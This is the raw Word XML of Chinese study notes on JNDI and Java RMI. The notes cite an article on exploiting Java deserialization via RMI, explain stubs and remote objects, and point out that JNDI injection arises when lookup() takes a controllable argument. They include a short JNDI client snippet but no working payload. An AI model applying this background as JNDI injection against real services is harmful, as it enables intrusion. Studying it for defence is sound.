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9A1A5" w14:textId="41DFFB45" w:rsidR="00730FF2" w:rsidRPr="00730FF2" w:rsidRDefault="00730FF2">
      <w:r w:rsidRPr="00730FF2">
        <w:t>https://kingx.me/Exploit-Java-Deserialization-with-RMI.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999FBB1" w14:textId="77777777" w:rsidR="00730FF2" w:rsidRDefault="00730FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1273DB3A" w14:textId="3CBCD30E" w:rsidR="005737AA" w:rsidRPr="00827E09" w:rsidRDefault="00730FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00827E09" w:rsidRPr="00827E09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jndi是什么</w:t>
      </w:r>
      <w:r w:rsidR="00827E09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78233003" w14:textId="77777777" w:rsidR="00DD7F59" w:rsidRDefault="00DD7F59" w:rsidP="00DD7F59">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单来说，</w:t>
      </w:r>
      <w:r>
        <w:t>JNDI (Java Naming and Directory Interface) 是一组</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>应用程序接口</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>它为开发人员查找和访问各种资源提供了统一的通用接口</w:t>
      </w:r>
      <w:r>
        <w:t>，可以</w:t>
      </w:r>
      <w:r w:rsidRPr="002E01EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>用来定位用户、网络、机器、对象和服务等各种资源</w:t>
      </w:r>
      <w:r>
        <w:t>。比如可以利用JNDI在局域网上定位一台打印机，也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象，RMI注册的服务可以通过JNDI接口来访问和调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5D7E6" w14:textId="77777777" w:rsidR="00DD7F59" w:rsidRDefault="00DD7F59" w:rsidP="00DD7F59"/>
    <w:p w14:paraId="0D3387B1" w14:textId="618505DD" w:rsidR="005737AA" w:rsidRDefault="00DD7F59" w:rsidP="00DD7F59">
      <w:r>
        <w:t>JNDI支持多种命名和目录提供程序（Naming and Directory Providers），RMI注册表服务提供程序（RMI Registry Service Provider）允许通过JNDI应用接口对RMI中注册的远程对象进行访问操作。将RMI服务绑定到JNDI的一个好处是更加透明、统一和松散耦合，RMI客户端直接通过URL来定位一个远程对象，而且该RMI服务可以和包含人员，组织和网络资源等信息的企业目录链接在一起。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473ECEF9" w14:textId="0D9ABE0F" w:rsidR="002E01EC" w:rsidRDefault="002E01EC" w:rsidP="00DD7F59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6813514C" wp14:editId="1854F07E">
            <wp:extent cx="4047621" cy="2901461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="JNDI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NDI架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194" cy="290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A0657" w14:textId="4C242265" w:rsidR="002E01EC" w:rsidRDefault="002E01EC" w:rsidP="00DD7F59">
      <w:r w:rsidRPr="002E01EC">
        <w:t>JNDI接口在初始化时，可以将RMI URL作为参数传入，而JNDI注入就出现在客户端的lookup()函数中，如果lookup()的参数可控就可能被攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21485FE6" w14:textId="4E62D09B" w:rsidR="002E01EC" w:rsidRDefault="002E01EC" w:rsidP="00DD5F04">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723ED06C" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Hashtable env = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D01D33"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04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DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Hashtable();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECEAB95" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>env.put(Context.INITIAL_CONTEXT_FACTORY, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"com.sun.jndi.rmi.registry.RegistryContextFactory"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099956B6" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="696854"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>//com.sun.jndi.rmi.registry.RegistryContextFactory </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="696854"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="696854"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>RMI Registry Service Provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="696854"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="696854"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Factory  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA04707" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>env.put(Context.PROVIDER_URL, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00DD5F04">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
            <w:color w:val="E3E658"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>rmi://kingx_kali:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D1B940" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Context ctx = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D01D33"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04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DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>InitialContext(env);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCA0B1" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD5F04">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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D5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Object local_obj = ctx.lookup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00DD5F04">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
            <w:color w:val="E3E658"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>rmi://kingx_kali:8080/test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5F04">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DADB787" w14:textId="6C669A72" w:rsidR="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD7F59"/>
    <w:p w14:paraId="373FF08A" w14:textId="77777777" w:rsidR="00DD5F04" w:rsidRPr="00DD5F04" w:rsidRDefault="00DD5F04" w:rsidP="00DD7F59"/>
    <w:p w14:paraId="6F5C99FC" w14:textId="5AD02183" w:rsidR="002E01EC" w:rsidRPr="002E01EC" w:rsidRDefault="002E01EC" w:rsidP="00DD7F59"/>
    <w:p w14:paraId="6C63D2C4" w14:textId="2513503D" w:rsidR="002E01EC" w:rsidRPr="00730FF2" w:rsidRDefault="00730FF2" w:rsidP="00DD7F59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="002E01EC" w:rsidRPr="00730FF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rmi是什么：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057EF02" w14:textId="75284308" w:rsidR="00DD7F59" w:rsidRDefault="00730FF2" w:rsidP="0004214A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>远程方法调用是分布式编程中的一个基本思想。实现远程方法调用的技术有很多，比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:t>CORBA、WebService，这两种都是独立于编程语言的。而</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:t>（Remote Method Invocation）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>专为Java环境设计的远程方法调用机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>远程服务器实现具体的Java方法并提供接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>客户端本地仅需根据接口类的定义，提供相应的参数即可调用远程方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00730FF2">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0828B" w14:textId="4F27BD46" w:rsidR="00730FF2" w:rsidRDefault="00730FF2" w:rsidP="00DD7F59"/>
    <w:p w14:paraId="4294F3D5" w14:textId="1310EE4F" w:rsidR="0004214A" w:rsidRPr="00BC3EA6" w:rsidRDefault="0004214A" w:rsidP="00DD7F59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>远程对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F167E6A" w14:textId="3DC7E2FE" w:rsidR="0004214A" w:rsidRDefault="0004214A" w:rsidP="0004214A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0004214A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用远程方法调用，必然会涉及参数的传递和执行结果的返回。参数或者返回值可以是基本数据类型，当然也有可能是对象的引用。所以这些需要</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>被传输的对象必须可以被序列化，</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这要求相应的类必须实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:t xml:space="preserve"> java.io.Serializable 接口，并且客户端的serialVersionUID字段要与服务器端保持一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BF3DB" w14:textId="166DB13E" w:rsidR="0004214A" w:rsidRDefault="0004214A" w:rsidP="0004214A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0004214A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>任何可以被远程调用方法的对象必须实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> java.rmi.Remote 接口</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>远程对象的实现类必须继承UnicastRemoteObject类</w:t>
      </w:r>
      <w:r w:rsidRPr="0004214A">
        <w:t>。如果不继承UnicastRemoteObject类，则需要手工初始化远程对象，在远程对象的构造方法的调用UnicastRemoteObject.exportObject()静态方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E106E5F" w14:textId="09354635" w:rsidR="0004214A" w:rsidRDefault="0004214A" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="5BD318F3" w14:textId="62AB560B" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3EA6">
        <w:t>JVM之间通信时，RMI对远程对象和非远程对象的处理方式是不一样的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00003EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>它并没有直接把远程对象复制一份传递给客户端，而是传递了一个远程对象的Stub，Stub基本上相当于是远程对象的引用或者代理</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC3EA6">
        <w:t>。Stub对开发者是透明的，客户端可以像调用本地方法一样直接通过它来调用远程方法。Stub中包含了远程对象的定位信息，如Socket端口、服务端主机地址等等，并实现了远程调用过程中具体的底层网络通信细节，所以RMI远程调用逻辑是这样的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051BEB9A" w14:textId="73FC33BB" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484DD572" wp14:editId="6EDDB279">
            <wp:extent cx="5274310" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="RMI远程调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MI远程调用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5BEF" w14:textId="77777777" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从逻辑上来看，数据是在</w:t>
      </w:r>
      <w:r>
        <w:t>Client和Server之间横向流动的，但是实际上是从Client到Stub，然后从Skeleton到Server这样纵向流动的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3978D5C3" w14:textId="77777777" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="6BAD6FEE" w14:textId="4F7AB5DE" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>1.Server端监听一个端口，这个端口是JVM随机选择的；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABF259" w14:textId="48AE907D" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:t>2.Client端并不知道Server远程对象的通信地址和端口，但是Stub中包含了这些信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>并封装了底层网络操作；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D27F6" w14:textId="07ECCFD7" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>3.Client端可以调用Stub上的方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72C3EF" w14:textId="21D925AB" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>4.Stub连接到Server端监听的通信端口并提交参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3912D" w14:textId="29E893F5" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r>
        <w:t>Server端上执行具体的方法，并返回结果给Stub；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06752DAA" w14:textId="20A56BA9" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.Stub返回执行结果给Client端，从Client看来就好像是Stub在本地执行了这个方法一样；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7B2EA" w14:textId="58657CB7" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那怎么获取</w:t>
      </w:r>
      <w:r>
        <w:t>Stub呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAA56D" w14:textId="2727BA8E" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="36F5C1FE" w14:textId="0D2009E3" w:rsidR="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="2128106D" w14:textId="77777777" w:rsidR="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="5DCC45EF" w14:textId="24B7353A" w:rsidR="00BC3EA6" w:rsidRPr="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3EA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 RMI注册表</w:t>
      </w:r>
    </w:p>
